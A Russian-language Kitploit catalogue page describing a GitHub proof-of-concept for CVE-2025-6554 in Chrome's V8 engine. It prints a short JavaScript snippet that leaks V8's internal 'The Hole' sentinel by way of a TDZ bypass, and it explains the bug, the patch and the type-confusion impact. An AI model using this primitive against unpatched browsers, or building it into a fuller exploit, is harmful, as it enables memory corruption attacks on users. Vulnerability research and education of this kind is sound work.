Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6554 — Эксплойт-доказательство концепции для уязвимости в движке JavaScript V8 (CVE-2025-6554), демонстрирующий обход TDZ, который раскрывает sentinel 'The Hole', что позволяет вызвать путаницу типов и потенциальное повреждение памяти. | Kitploit
Инструменты/GitHubGitHub/pwntoday/cve-2025-6554
Анализ уязвимостейЭксплуатацияСтатьи и ИсследованияОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubpwntoday/cve-2025-6554

CVE-2025-6554

Эксплойт-доказательство концепции для уязвимости в движке JavaScript V8 (CVE-2025-6554), демонстрирующий обход TDZ, который раскрывает sentinel 'The Hole', что позволяет вызвать путаницу типов и потенциальное повреждение памяти.

Репозиторий
231 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-6554

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();

Ошибка

Переменная y была доступна до объявления. Обычно это должно вызывать ReferenceError (TDZ), но в старых версиях V8 при комбинации с delete x?.[y] проверка не срабатывала и возвращала внутреннее значение-маркер "The Hole".

До исправления

V8 проверял TDZ только один раз, а затем ошибочно предполагал, что y корректен. Это позволяло "The Hole" попасть в пользовательский код.

Исправление

Патч заставляет выполнять новую проверку TDZ (ThrowReferenceErrorIfHole) при каждом доступе, гарантируя, что y до инициализации всегда вызывает исключение.

Воздействие: Злоумышленники могут перехватить "The Hole" и использовать его для путаницы типов, манипуляций стеком или обхода областей видимости.

Скачать инструмент